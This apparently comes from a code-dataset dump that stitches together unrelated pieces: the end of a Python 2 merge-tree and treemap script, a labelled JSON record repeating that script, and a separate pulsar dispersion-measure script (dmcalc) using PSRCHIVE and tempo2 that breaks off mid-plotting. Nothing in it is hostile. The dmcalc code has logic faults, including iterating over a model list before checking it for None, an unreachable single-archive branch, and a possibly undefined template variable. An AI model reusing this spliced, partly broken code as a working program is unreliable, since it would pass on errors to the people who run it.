print str(node.preorder) + " [label=\""+ str(node.preorder) + " \\n["+ str(node.pair.preorder) + "]"+"\"]"
def print_edge(node):
print str(node.parent.preorder) + "->" + str(node.preorder)
def print_tree_dot(node):
if(node == None):
return
else:
print_label(node)
for child in node.children:
print_edge(child)
print_tree_dot(child)
def make_tree(name, path):
global file_name, file_path
file_name = name
file_path = path
root = get_merge_tree()
get_persistent_pairs()
tree = initialize_tree(root)
traverse(root, tree)
add_pairs(tree)
postorder(tree)
preorder(tree)
#write_tree(tree)
print_treemap(tree)
#print "digraph {"
#print_tree_dot(tree)
#print "}"
|
normal
|
{
"blob_id": "4daab8b8db1e394e3132ab5550fe0236b67074d8",
"index": 5527,
"step-1": "from helper import *\n\ntree_type = TREE_TYPE_SPLIT\n\nfile_name = ''\nfile_path = ''\n\nsplit_scalars = {}\nvisited = {}\nadjacency = {}\npairs = {}\n\nindex_map = {}\npostorder_map = {}\npreorder_map = {}\n\nbirth = {}\ndeath = {}\n\nstring = ''\n\nclass Tree(object):\n\tdef __init__(self):\n\t\tself.index = None\n\t\tself.children = []\n\t\tself.parent = None\n\t\tself.label = None\n\t\tself.pair = None\n\t\tself.birth = None\n\t\tself.death = None\n\t\tself.postorder = None\n\t\tself.preorder = None\n\n\tdef __str__(self):\n\t\treturn str(self.index)\n\ndef initialize_tree(index):\n\troot = Tree()\n\troot.index = index\n\troot.label = split_scalars[index]\n\troot.pair = pairs[index]\n\n\t# add mapping to dictionary\n\tindex_map[index] = root\n\n\treturn root\n\ndef add_node(index, parent):\n\tnode = Tree()\n\tnode.index = index\n\tparent.children.append(node)\n\tnode.parent = parent\n\tnode.label = split_scalars[index]\n\tnode.pair = pairs[index]\n\n\t# add mapping to dictionary\n\tindex_map[index] = node\n\n\treturn node\n\n\ndef compare_nodes(a, b):\n\t# try to sort using the split_scalars\n\t# if they are equal, sort using index value\n\tif split_scalars[a] > split_scalars[b]:\n\t\treturn 1\n\telif split_scalars[a] == split_scalars[b]:\n\t\tif a > b:\n\t\t\treturn 1\n\t\telse:\n\t\t\treturn -1\n\telse:\n\t\treturn -1\n\ndef traverse(index, parent):\n\t#print index, split_scalars[index]\n\tvisited[index] = True\n\tadjacency[index].sort(compare_nodes)\n\tfor node in adjacency[index]:\n\t\tif not visited[node]:\n\t\t\tcurrent = add_node(node, parent)\n\t\t\ttraverse(node, current)\n\ndef add_pairs(node):\n\tif(node == None):\n\t\treturn\n\telse:\n\t\tnode.pair = index_map[pairs[node.index]]\n\t\tnode.birth = index_map[birth[node.index]]\n\t\tnode.death = index_map[death[node.index]]\n\t\tfor child in node.children:\n\t\t\tadd_pairs(child)\n\ndef postorder(node):\n\t# python needs a mutable object for updation\n\torder = {'index': 1}\n\n\tdef set_order(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\tfor child in node.children:\n\t\t\t\tset_order(child)\n\n\t\t\tnode.postorder = order['index']\n\t\t\tpostorder_map[order['index']] = node\n\t\t\torder['index'] += 1\n\n\tset_order(node)\n\ndef preorder(node):\n\t# python needs a mutable object for updation\n\torder = {'index': 1}\n\n\tdef set_order(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\tnode.preorder = order['index']\n\t\t\tpreorder_map[order['index']] = node\n\t\t\torder['index'] += 1\n\n\t\t\tfor child in node.children:\n\t\t\t\tset_order(child)\n\n\tset_order(node)\n\ndef stringify_tree(node):\n\tglobal string\n\tif(node == None):\n\t\treturn\n\telse:\n\t\tstring += '{'\n\t\tstring += str(node.postorder) + '|'\n\t\tstring += str(node.index) + '|'\n\t\tstring += str(node.label) + '|'\n\t\tstring += str(node.birth.label) + '|'\n\t\tstring += str(node.death.label)\n\n\t\tfor child in node.children:\n\t\t\tstringify_tree(child)\n\n\t\tstring += '}'\n\n\treturn string\n\ndef get_merge_tree():\n\t# Get merge tree path\n\ttree_file_arguments = [tree_type, TREE_INFIX, file_name, CSV_EXTENSION]\n\ttree_file_path = get_output_path(file_path, tree_file_arguments, folder_name = TREES_FOLDER)\n\n\t# Read merge tree file\n\twith open(tree_file_path, 'rb') as csvfile:\n\t\tcsvfile.readline()\n\t\tspamreader = csv.reader(csvfile, delimiter=' ')\n\t\tfor r in spamreader:\n\t\t\trow = r[0].split(',')\n\t\t\tnode1 = int(row[0])\n\t\t\tnode2 = int(row[1])\n\n\t\t\tsplit_scalars[node1] = float(row[2])\n\t\t\tsplit_scalars[node2] = float(row[3])\n\n\t\t\tvisited[node1] = False\n\t\t\tvisited[node2] = False\n\n\t\t\tif node1 not in adjacency.keys():\n\t\t\t\tadjacency[node1] = []\n\n\t\t\tif node2 not in adjacency.keys():\n\t\t\t\tadjacency[node2] = []\n\n\t\t\tadjacency[node1].append(node2)\n\t\t\tadjacency[node2].append(node1)\n\n\tfor i in adjacency.keys():\n\t\tif len(adjacency[i]) == 1:\n\t\t\tif (split_scalars[i] < split_scalars[adjacency[i][0]]):\n\t\t\t\troot = i\n\n\treturn root\n\ndef get_persistent_pairs():\n\t# Get persistence pairs\n\tpairs_file_arguments = [tree_type, PAIRS_INFIX, file_name, CSV_EXTENSION]\n\tpairs_file_path = get_output_path(file_path, pairs_file_arguments, folder_name = PAIRS_FOLDER)\n\n\twith open(pairs_file_path, 'rb') as persistence_pairs:\n\t\tpersistence_pairs.readline()\n\t\tspamreader = csv.reader(persistence_pairs, delimiter=' ')\n\t\tfor r in spamreader:\n\t\t\trow = r[0].split(',')\n\t\t\tnode1 = int(row[0])\n\t\t\tnode2 = int(row[1])\n\n\t\t\t#if (node1 in split_scalars.keys()) and (node2 in split_scalars.keys()):\n\t\t\t# there will be pairs that do not exist in the merge tree\n\t\t\t# they will be removed/ignored subsequently\n\n\t\t\tpairs[node1] = node2\n\t\t\tpairs[node2] = node1\n\n\t\t\t# add birth and death values of nodes to dictionaries\n\t\t\tbirth[node1] = node1\n\t\t\tdeath[node1] = node2\n\n\t\t\tbirth[node2] = node1\n\t\t\tdeath[node2] = node2\n\ndef write_tree(node):\n\ttuple_file_arguments = [file_name, TXT_EXTENSION]\n\ttuple_file_path = get_output_path(file_path, tuple_file_arguments, folder_name = TUPLES_FOLDER)\n\n\ttuple_file = open(tuple_file_path, 'w')\n\tfieldnames = ['timestep', 'postorder', 'value', 'birth', 'death']\n\n\twriter = csv.writer(tuple_file, delimiter=',')\n\twriter.writerow(fieldnames)\n\n\tdef pretty_print_tree(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\ttimestep = file_name.split('tv_')[1]\n\t\t\tvalues = [timestep, node.postorder, node.label, node.birth.label, node.death.label]\n\t\t\twriter.writerow(values)\n\n\t\t\tfor child in node.children:\n\t\t\t\tpretty_print_tree(child)\n\n\tpretty_print_tree(node)\n\ndef print_treemap(node):\n\tprocessed_nodes = {}\n\ttreemap_string = {}\n\ttreemap_value = {}\n\ttreemap_parent = {}\n\ttreemap_container = {}\n\n\tdef find_treemap_parent(node):\n\t\tif node.preorder not in processed_nodes:\n\t\t\tparent_node = node.parent\n\t\t\tpaired_node = node.pair\n\t\t\tparent_found = False\n\n\t\t\t# keep going up the merge tree till you find a parent that itself and its pair within the range\n\t\t\twhile((parent_node != None) and (parent_found == False)):\n\t\t\t\tif parent_node.preorder < node.preorder < parent_node.pair.preorder:\n\t\t\t\t\tparent_found = True\n\t\t\t\telse:\n\t\t\t\t\tparent_node = parent_node.parent\n\n\t\t\tif not parent_found:\n\t\t\t\ttreemap_container[node.preorder] = str(node.preorder)\n\t\t\t\ttreemap_parent[node] = None\n\t\t\t\ttreemap_parent[node.pair] = node\n\t\t\telse:\n\t\t\t\ttreemap_container[node.preorder] = treemap_container[parent_node.preorder] + \".\" + str(node.preorder)\n\t\t\t\ttreemap_parent[node.pair] = node\n\t\t\t\ttreemap_parent[node] = parent_node\n\n\t\t\ttreemap_string[node.preorder] = treemap_container[node.preorder] + \".\" + str(node.preorder)\n\t\t\ttreemap_string[node.pair.preorder] = treemap_container[node.preorder] + \".\" + str(node.pair.preorder)\n\n\t\t\ttreemap_value[node.pair.preorder] = node.pair.label\n\t\t\ttreemap_value[node.preorder] = node.label\n\n\t\t\tprocessed_nodes[node.preorder] = True\n\t\t\tprocessed_nodes[node.pair.preorder] = True\n\n\tdef get_tree_structure(node):\n\t\tif(node == None):\n\t\t\treturn\n\t\telse:\n\t\t\tfind_treemap_parent(node)\n\t\t\tfor child in node.children:\n\t\t\t\tget_tree_structure(child)\n\n\tget_tree_structure(node)\n\tfor key in treemap_container.keys():\n\t\tprint str(treemap_container[key]) + \",\"\n\n\tfor key in treemap_string.keys():\n\t\tprint str(treemap_string[key]) + \",\"+ str(int((treemap_value[key]+0.05)*1000))\n\ndef print_label(node):\n\tprint str(node.preorder) + \" [label=\\\"\"+ str(node.preorder) + \" \\\\n[\"+ str(node.pair.preorder) + \"]\"+\"\\\"]\"\n\ndef print_edge(node):\n\tprint str(node.parent.preorder) + \"->\" + str(node.preorder)\n\ndef print_tree_dot(node):\n\tif(node == None):\n\t\treturn\n\telse:\n\t\tprint_label(node)\n\t\tfor child in node.children:\n\t\t\tprint_edge(child)\n\t\t\tprint_tree_dot(child)\n\n\ndef make_tree(name, path):\n\tglobal file_name, file_path\n\tfile_name = name\n\tfile_path = path\n\troot = get_merge_tree()\n\tget_persistent_pairs()\n\n\n\ttree = initialize_tree(root)\n\ttraverse(root, tree)\n\tadd_pairs(tree)\n\tpostorder(tree)\n\tpreorder(tree)\n\n\t#write_tree(tree)\n\n\tprint_treemap(tree)\n\n\t#print \"digraph {\"\n\t#print_tree_dot(tree)\n\t#print \"}\"\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#!/usr/bin/python
'''
** dmcalc **
Estimates the Dispersion Measure (DM) from the data in psrfits file format.
Returns the DM value with its uncertainty and reduced chi-square from tempo2
DM fit.
Dependencies
-------------
PSRCHIVE with python interface: http://psrchive.sourceforge.net/
TEMPO2: https://bitbucket.org/psrsoft/tempo2
SKLEARN: https://scikit-learn.org/stable/install.html
Parameters
----------
file(s) : Input file(s) in psrfits format
ephem : Ephemeris (or parameter) file of the pulsar. This is required
to update the model. It can be given as a command line argument.
If it is available in "PWD/ephemerides" folder, one can use that.
Giving the file with this option overrides the default one.
model : Template profile for cross-correlating with the observation to
obtain DM. It can be given as a command line argument, otherwise
it will look for a matching one in "PWD/ephemerides" directory
and if found, will use that instead. One can use this option to
override the default selection.
fscrunch : int, optional, default: None. Factor for scrunching the frequency
channels before passing it to DM estimation.
b3fscrunch : int, optional, default: None. Factor for scrunching the BAND3
data of uGMRT before passing it to DM estimation.
b3fscrunch : int, optional, default: None. Factor for scrunching the BAND5
data of uGMRT before passing it to DM estimation.
offset : float, optional, default: None. Fix for jump between BAND3 and
BAND5 of uGMRT bands.
writeout : bool, optional, default: False. Writes out the file corrected
for DM in a default directory (PWD/PSRJ_{site}_final), using the
following options to reduce the file.
plot : bool, optional, default: True. Prints the data analysis plot in
a PDF file. ToA rejection steps and DM corrected ToAs are shown
in addition to DM corrected frequency evolution of the profile.
ptoa : bool, optional, default: False. Prints the outliers cleaned ToAs
to a file in the TEMPO2 readable format, so that, if required,
it can be used for other purposes.
Fscrunch : bool, optional, default: False. Collapse all frequency channels
to produce one profile.
Tscrunch : bool, optional, default: False. Collapse all sub-integrations
to produce one profile.
tscrunch : int, optional, default: None. Factor to scrunch sub-integrations
for writing out the DM corrected file.
quiet : bool, optional, default: False. Supresses all print statements
except warnings and errors.
Returns
-------
Dispersion Measure with uncertainty.
Examples
--------
# (a) for DM estimation with files in default directories:
#
dmcalc.py inputfile.fits
#
# (c) to use different ephemeris and template files:
#
dmcalc.py -E ephemeris.par -M model.fits data_file.fits
#
# (d) to write the DM corrected fits file and ToAs:
#
./dmcalc2.py -w -ptoa inputfile.fits
'''
# import modules...
import os
import sys
import numpy as np
import psrchive
import argparse
import time
import warnings
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import gridspec
start = time.time()
parser = argparse.ArgumentParser(description='Code for measuring in-band '+
'DM for pulsar data in psrfits format.')
parser.add_argument('files', nargs='+', type=str,
help='The list of fits file(s) for processing')
parser.add_argument('-E', '--ephem', type=str,
help='Ephemeris file to update the model. Exits if not '+
'given or is not available in "PWD/ephemerides" '+
'directory')
parser.add_argument('-M', '--model', nargs='+', type=str,
help='Model template for ToA generation. Exits if not '+
'given or is not available in "PWD/templates" '+
'directory')
parser.add_argument('-f','--fscrunch', type=int, default=1,
help='Factor to scrunch the number of channels for '+
'doing DM estimation (Def: 1)')
parser.add_argument('-b3f','--b3fscrunch', type=int, default=1,
help='Factor to scrunch the number of channels for '+
'band3 GMRT data (Def: 1)')
parser.add_argument('-b5f','--b5fscrunch', type=int, default=1,
help='Factor to scrunch the number of channels for '+
'band5 GMRT data (Def: 1)')
parser.add_argument('-w','--writeout', action='store_true',
help='Writes out the DM corrected file. Def: False')
parser.add_argument('-ptoa','--print_toas', action='store_true',
help='Print the prefit ToAs to file in tempo2 format. '+
'Def: False')
parser.add_argument('-F','--Fscrunch', action='store_true',
help='Fully scrunch the number of channels for the '+
'final output archive (Def: False)')
parser.add_argument('-T','--Tscrunch', action='store_true',
help='Completely time scrunch all the integrations')
parser.add_argument('-t','--tscrunch', type=int, default=1,
help='Factor to scrunch the number of integrations for '+
'the final output archive (Def: None)')
parser.add_argument('-o','--offset', type=float, default=0.670520675,
help='Offset to shift band 5 ToAs (in secs)')
parser.add_argument('-q', '--quiet', action='store_true',
help='Only print warnings')
def main():
# parses the input arguments
args = parser.parse_args()
# checks status of quiet and ptoa
quiet=False
if args.quiet:
quiet=True
tempo2=True
ptoa=False
if args.print_toas:
ptoa=True
if not quiet:
print("Loading the archive files for DM estimation")
# loads the psrfits file
archives = []
for filename in args.files:
archives.append(psrchive.Archive_load(filename))
narch = len(archives)
if narch >= 1:
if not quiet:
print("Appending the archives ..."),
# append data
ar = freq_appendData(narch, archives, args.offset,
args.b3fscrunch, args.b5fscrunch)
if not quiet:
print(" done!")
else:
if not quiet:
print("Only one archive was given, so nothing to frequency-append.")
# ar is the final archive after performing frequency append
ar = archives[0]
del archives
# extracts relevant information from the archive
ar_psr = ar.get_source()
ar_nbins = ar.get_nbin()
ar_tel = ar.get_telescope()
mjd_start=ar.get_Integration(0).get_start_time().in_days()
mjd_end=ar.get_Integration(0).get_end_time().in_days()
ar_mjd = mjd_start + (mjd_end-mjd_start)/2.
length = ar.integration_length()
ar.update_centre_frequency()
ar_centfr = ar.get_centre_frequency()
ar_nchan = ar.get_nchan()
ar_bw = ar.get_bandwidth()
ar_chnwdth = ar_bw / ar_nchan
ffrac = args.fscrunch
if not quiet:
print("\nNow preparing for DM estimation\n")
pwd=os.getcwd()
# checks for ephemeris file and exit if not given or is not available
# in the default directory "PWD/ephemerides".
if args.ephem != None:
ephemeris = args.ephem
else:
ephemeris = "ephemerides/"+ar_psr+".par"
if not (os.path.exists(ephemeris)):
sys.exit(1)
if not quiet:
print ("\nEphemeris file is:"+ephemeris+'\n')
# if template is given as input argument load and process them
model = []
for filename in args.model:
model.append(psrchive.Archive_load(filename))
if args.model != None:
if len(args.model) == 1:
model = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)
if len(args.model) > 1:
model = freq_appendModel(1,model,args.offset, args.b3fscrunch, args.b5fscrunch)
# If the template is not given, looking for a matching template in the templates directory
if args.model == None:
if not quiet:
print("Looking for matching template in templates directory..."),
import subprocess
tempdir="templates/*.sm"
tempfile=ar_psr+'_tmp.txt'
a=subprocess.call("psredit -c name,nbin,bw,nchan,freq -Q '%s' > '%s'"
% (tempdir,tempfile), shell=True)
tempnchan=""
t1=str(ar_nbins)
if ar_tel=='gmrt':
t2=str(int(ar_bw))
else:
t2=str((ar_bw))
t3=('%.2f'%ar_centfr)
f = open(tempfile,'r')
for line in f:
line = line.strip()
columns=line.split()
t4 = float(columns[5])
t4 = ('%.2f'%t4)
if ar_tel=='gmrt':
if (columns[1]==ar_psr and columns[2]==t1 and str(int(columns[3]))==t2 and t4==t3):
modeltempl=columns[0]
tempnchan=columns[4]
if not quiet:
print (' done\n')
else:
if (columns[1]==ar_psr and columns[2]==t1 and str((columns[3]))==t2 and t4==t3):
modeltempl=columns[0]
tempnchan=columns[4]
if not quiet:
print (' done\n')
if modeltempl=='' and tempnchan=='':
print("\n** No matching template found for DM fitting. Exiting. **\n")
sys.exit(1)
f.close()
os.remove(tempfile)
if not quiet:
print("Found matching template: "+modeltempl)
model.append(psrchive.Archive_load(modeltempl))
if not quiet:
print("\nEstimating the DM from the observation")
model.update_centre_frequency()
# cloning the original file for passing to DMCalc() routine
arch = ar.clone()
# Calling the DM estimation routine
dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err = DMCalc(arch, ar_nchan, ar_centfr,
ar_bw, ar_psr, ar_tel, ar_mjd, model,
ephemeris, pwd, ffrac, quiet, tempo2,
ptoa, narch)
# writing out the final DM corrected file, if requested
if args.writeout:
# removing the DM and DMEPOCH from the ephemeris file for uptation
infile = open(ephemeris,"r")
tmpeph = ar_psr+'.eph'
output = open(tmpeph,"w+")
for i, line in enumerate(infile):
if not line.lstrip().startswith('DM'):
if not line.lstrip().startswith('DMEPOCH'):
output.write(line)
infile.close()
output.close()
# updating the ephemeris file with measured DM
dmline = "DM "+str(dmval)+"\t\t"+str(dmverr)
dmepochline = "DMEPOCH "+str(round(ar_mjd,2))
if not args.quiet:
print("Updating the ephemeris with new DM... "),
f = open(tmpeph,'a')
f.write("%s\n %s\n" % (dmline, dmepochline))
if not args.quiet:
print(" done!")
f.close()
# updating the ephemeris in the archive with the measured DM
if not quiet:
print("Correcting the DM of the observed file and writing it out... "),
os.remove(tmpeph)
# creating the directory for writing the file
dirfinal=os.path.join(pwd,ar_psr+"_"+ar_tel+"_final")
if not os.path.exists(dirfinal):
os.makedirs(dirfinal)
# filename with path of the DM corrected file
outfile = dirfinal+"/"+ar_psr + "_" + str(ar_mjd) + "_" + ar_tel + ".ar"
# Setting the DMC flag to 1. In other words, doing the DM correction.
ar.set_dispersion_measure(dmval)
ar.dedisperse()
# Performing different scrunching in the archive for writing out
if not args.Tscrunch:
ar.tscrunch(args.tscrunch)
else:
ar.tscrunch()
if not args.Fscrunch:
ar.fscrunch(ffrac)
else:
ar.fscrunch()
# Writing out the DM corrected, time/frequency scrunched file.
ar.unload(outfile)
if not args.quiet:
print(" done!")
del ar
if not quiet:
print("The file is corrected for DM and is written out to\n"+outfile)
# Printing the results to the file and also in the terminal
f= open(ar_psr+"_DM_timeseries.txt",'a')
f.write('%s %.4f %.6f %.6f %.2f %.4f %.4f %.4f %.2f %.2f %s\n' %( filename, \
ar_mjd, dmval, dmverr, fitchisq, pre_rms, post_rms, ToA_Err, ar_centfr, \
ar_bw, ar_tel))
f.close()
import time
end = time.time()
total = end - start
print ('-----------------------------------------------------------------------------')
print ('MJD\t\tDM\t\tDMerr\t\tChisq\tC_Fr\tBW\tTel')
print ('%.6f\t%.6f\t%.6f\t%.2f\t%.1f\t%.1f\t%s' % (ar_mjd, dmval, dmverr,
fitchisq, ar_centfr, ar_bw, ar_tel) )
print ('-----------------------------------------------------------------------------')
print("\nThe program took %.1f seconds to finish"%total)
#-------------------------------------------------------------------------------------------#
''' Main function that performs the DM estimation '''
def DMCalc(ar, ar_nchan, ar_centfr, ar_bw, ar_psr, ar_tel, ar_mjd, model, ephemeris, pwd, ffrac, quiet, tempo2, ptoa, narch):
# Checks if model file is available.
if model == None:
sys.exit(1)
init_dm = ar.get_dispersion_measure()
# setting up the ToA estimation routine using the psrchive ArrivalTime()
if not quiet:
print("Using the ArrivalTime (pat) with PGS in Tempo2 format")
arrtim = psrchive.ArrivalTime()
arrtim.set_shift_estimator('PGS')
arrtim.set_format('Tempo2')
arrtim.set_format_flags('IPTA')
if not quiet:
print("Loading the template file for processing... "),
std = model.clone()
std.pscrunch()
std.tscrunch()
std_nchan = std.get_nchan()
std.dedisperse()
std.fscrunch(ffrac)
arrtim.set_standard(std)
if not quiet:
print(" done!")
ar.fscrunch(ffrac)
ar.pscrunch()
ar.tscrunch()
arrtim.set_observation(ar)
if not quiet:
print("Finding the ToAs... "),
# Finding the ToAs and reading it into numpy arrays
toas = arrtim.get_toas()
toas_filtered = [x.split()[:5] for x in toas]
str_filename,str_freq,str_mjd,str_toaErr,str_site = zip(*toas_filtered)
freq = np.asarray(str_freq, dtype=np.float64)
amjd = np.asarray(str_mjd, dtype=np.float64)
terr = np.asarray(str_toaErr, dtype=np.float64)
if not quiet:
print(" done!")
print("Removing the bad ToAs using Huber Regression... "),
# removing the ToAs with zero errors
condition1 = terr < 3*np.median(terr)
freqnew = np.extract(condition1,freq)
amjdnew = np.extract(condition1,amjd)
terrnew = np.extract(condition1,terr)
# writing the ToAs to a temporary file for getting the non-phase resolved ToAs using general2
tempfile = ar_psr+"_tmp.txt"
f = open(tempfile,"w+")
head="FORMAT 1\n"
f.write('%s' % head)
for i in range(0,np.size(freqnew)):
f.write('%s %.12f %.20f %.8f %s\n' %
(str_filename[0], freqnew[i], amjdnew[i], terrnew[i], str_site[0]))
f.close()
tmpstr="tempo2 -output general2 -f"
tmp = os.popen(tmpstr+" %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'" %
(ephemeris,tempfile)).read()
os.remove(tempfile)
# extracting the data from general2 output
tmp1 = tmp.split('\n')
freqtmp = np.zeros(np.size(amjdnew))
toastmp = np.zeros(np.size(amjdnew))
TErrtmp = np.zeros(np.size(amjdnew))
for i in range(np.size(amjdnew)):
_,freqtmp[i],toastmp[i],TErrtmp[i] = (tmp1[i].split())
TErrtmp /= 1e+6
# importing libraries for outlier removal
from sklearn import linear_model
from sklearn.linear_model import HuberRegressor
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
# changing the shape of frequency array
freqarr = freqtmp.reshape(-1,1)
# making a nu^2 model and fitting using Huber Regression
toastmp *= 1e+6
toashift = (np.min(toastmp)*-1.5)
toastmp += toashift
Terrtmp = TErrtmp*1e+6
model = make_pipeline(PolynomialFeatures(2), HuberRegressor())
model.fit(freqarr,toastmp,
huberregressor__sample_weight=np.ravel(1./Terrtmp))
y_pred = model.predict(freqarr)
residuals = toastmp - y_pred
median = np.median(residuals)
MAD = np.median(np.abs(residuals-np.median(residuals)))/0.6744897501960817
# filtering the good ToAs
condition2 = (residuals > median - 3*MAD) & (residuals < median + 3*MAD)
freqf = np.around(np.extract(condition2,freqarr),3)
amjdf = np.extract(condition2,amjdnew)
toasf = np.extract(condition2,toastmp)
terrf = np.extract(condition2,TErrtmp)
prefit_rms = np.sqrt(np.cov(toasf, aweights=terrf))
terrf *= 1e+6
if not quiet:
print(" done!")
# writing out the ToAs in proper format
if ptoa:
if not quiet:
print ('Writing out ToAs into a file in tempo2 format'),
dirtoas=os.path.join(pwd,ar_psr+"_"+ar_tel+"_ToAs")
if not os.path.exists(dirtoas):
os.makedirs(dirtoas)
outfile=dirtoas+"/"+ar_psr+"_"+str(ar_mjd)+"_"+ar_tel+"_ToAs.txt"
f = open(outfile,"w+")
head="FORMAT 1"
f.write('%s\n' % head)
for i in range(0,np.size(freqf)):
f.write('%s %.8f %.18f %.6f %s\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))
f.close()
if not quiet:
print("done!")
# Fitting the ToAs with tempo2 for DM
if not quiet:
print("\nWriting the ToAs to a temporary file for tempo2 fitting..."),
outfiletmp=ar_psr+"tmp_ToAs.txt"
f = open(outfiletmp,"w+")
head="FORMAT 1"
f.write('%s\n' % head)
for i in range(0,np.size(freqf)):
f.write('%s %.8f %.18f %.6f %s\n' % (str_filename[0], freqf[i], amjdf[i], terrf[i], str_site[0]))
f.close()
if not quiet:
print(" done!\n")
# performing the fit
dmstr=os.popen("tempo2 -f %s %s -nofit -fit dm | grep 'DM (cm^-3 pc)'| awk \'{print $5,$6}\'"
% (ephemeris, outfiletmp)).read()
(dm, dmerr) = dmstr.split()
dmval = float(dm)
dmverr = float(dmerr)
# doing the fit again to read the chisquare
chisqstr=os.popen("tempo2 -f %s %s -nofit -fit dm | grep 'Fit Chisq'| awk \'{print $9}\'"
% (ephemeris, outfiletmp)).read()
fitchisq = float(chisqstr)
os.remove(outfiletmp)
# Preparing the data for plotting the residuals, prefit and postfit
infile = open(ephemeris,"r")
tmpeph1 = ar_psr+'_tmpeph.eph'
output = open(tmpeph1,"w+")
for i, line in enumerate(infile):
if not line.lstrip().startswith('DM'):
if not line.lstrip().startswith('DMEPOCH'):
output.write(line)
infile.close()
output.close()
# updating the ephemeris file with measured DM
dmline = "DM "+str(dmval)+"\t1\t"+str(dmverr)
dmepochline = "DMEPOCH "+str(round(ar_mjd,2))
f = open(tmpeph1,'a')
f.write('%s\n%s\n' % (dmline, dmepochline))
f.close()
newarch = ar.clone()
newarch.tscrunch()
newarch.set_dispersion_measure(dmval)
arrtim.set_observation(newarch)
arrtim.set_standard(std)
toas1 = arrtim.get_toas()
toas1_filtered = [x.split()[:5] for x in toas1]
str_filename1,str_freq1,str_mjd1,str_toaErr1,str_site1 = zip(*toas1_filtered)
freq1 = np.asarray(str_freq1, dtype=np.float64)
amjd1 = np.asarray(str_mjd1, dtype=np.float64)
terr1 = np.asarray(str_toaErr1, dtype=np.float64)
freqnew1 = np.extract(condition1,freq1)
amjdnew1 = np.extract(condition1,amjd1)
terrnew1 = np.extract(condition1,terr1)
tempfile1 = ar_psr+"_tmp1.txt"
f = open(tempfile1,"w+")
head="FORMAT 1\n"
f.write('%s' % head)
for i in range(0,np.size(freqnew1)):
f.write('%s %.12f %.20f %.8f %s\n' % (str_filename1[0], freqnew1[i], amjdnew1[i], terrnew1[i], str_site1[0]))
f.close()
tmp2 = os.popen("tempo2 -output general2 -f %s %s -s \"1111111 {freq} {pre} {err}\n\" | grep '1111111'"
% (tmpeph1,tempfile1)).read()
os.remove(tempfile1)
os.remove(tmpeph1)
# extracting the data from general2 output
tmp3 = tmp2.split('\n')
freqtmp2 = np.zeros(np.size(amjdnew1))
toastmp2 = np.zeros(np.size(amjdnew1))
TErrtmp2 = np.zeros(np.size(amjdnew1))
for i in range(np.size(amjdnew1)):
_,freqtmp2[i],toastmp2[i],TErrtmp2[i] = (tmp3[i].split())
freqf1 = np.around(np.extract(condition2,freqtmp2),3)
amjdf1 = np.extract(condition2,amjdnew1)
toasf1 = np.extract(condition2,toastmp2)
terrf1 = np.extract(condition2,TErrtmp2)
toasf1 *= 1e+6
postfit_rms = np.sqrt(np.cov(toasf1, aweights=terrf1))
ar_nbin = newarch.get_nbin()
ar_nchn = newarch.get_nchan()
if (narch == 1):
freq_bot = (ar.get_centre_frequency() - ar_bw/2.0)
freq_top = (ar.get_centre_frequency() + ar_bw/2.0)
if (narch > 1):
if (ar_bw == 200.):
freq_bot = 400.0
freq_top = 1460.0
if (ar_bw == 400.):
freq_bot = 300.0
freq_top = 1460.0
# Getting the profile data for plotting
newarch.dedisperse()
newarch.remove_baseline()
profdata2D = newarch.get_data()[:,0,:,:].flatten().reshape(ar_nchn,ar_nbin)
prof = newarch.clone()
prof.fscrunch()
profdata1D = prof.get_data().flatten()
profdata1D /= np.max(profdata1D)
residDM = init_dm - dmval
dmcurve = 4.15 * 1000. * residDM * ( (1./(np.min(freqf)/1000.)**2) - (1./(freqf/1000.)**2) )
dmoff = np.median(toasf) - np.median(dmcurve)
dmcurve += dmoff
# Now does the actual plotting
fig = plt.figure(3, figsize=(8, 6))
fig.subplots_adjust(hspace=0.05)
ax0 = plt.subplot2grid((3, 8), (0,0), rowspan=2, colspan=3)
ax1 = plt.subplot2grid((3, 8), (2,0), rowspan=1, colspan=3)
ax2 = plt.subplot2grid((3, 8), (0,4), colspan=4)
ax3 = plt.subplot2grid((3, 8), (1,4), colspan=4)
ax4 = plt.subplot2grid((3, 8), (2,4), colspan=4)
ax0.imshow((np.sqrt(profdata2D**2))**0.5, origin='lower', extent=(0,ar_nbin-1,freq_bot,freq_top), aspect='auto', cmap='hot')
ax0.set_ylabel('Frequency (MHz)', fontweight='bold', fontsize=12)
ax0.tick_params(axis='x', which='both', bottom=True, top=True,
labelbottom=False)
ax1.plot(np.arange(ar_nbin, dtype=float),profdata1D, color='black', linewidth=0.5)
ax1.set_xlim(0,ar_nbin-1)
ax1.set_xlabel('Pulse Phase (bins)', fontweight='bold', fontsize=12)
ax1.set_ylabel('Intensity', fontweight='bold', fontsize=12)
ax2.errorbar(freqtmp, toastmp, yerr=Terrtmp,fmt='.', color='gray', label='Prefit: Unfiltered', capsize=2)
ax2.plot(freqtmp, y_pred,'--r', label='Polynomial Fit')
ax2.set_xlim(freq_bot, freq_top)
ax2.grid()
ax2.legend(loc='upper right')
ax2.axes.xaxis.set_ticklabels([])
ax3.yaxis.set_label_position("right")
ax3.errorbar(freqf, toasf-np.median(toasf), terrf,fmt='.k', label='Prefit: Filtered', capsize=2)
ax3.set_xlim(freq_bot, freq_top)
ax3.grid()
ax3.legend(loc='upper right')
ax3.axes.xaxis.set_ticklabels([])
ax3.set_ylabel(r'ToA Residuals ($\mu$s)', fontweight='bold', fontsize=12)
ax4.errorbar(freqf1, toasf1-np.median(toasf1), terrf1, fmt='.r', label='Postfit', capsize=2)
ax4.set_xlim(freq_bot, freq_top)
ax4.grid()
ax4.legend(loc='upper right')
ax4.set_xlabel('Frequency (MHz)', fontweight='bold', fontsize=12)
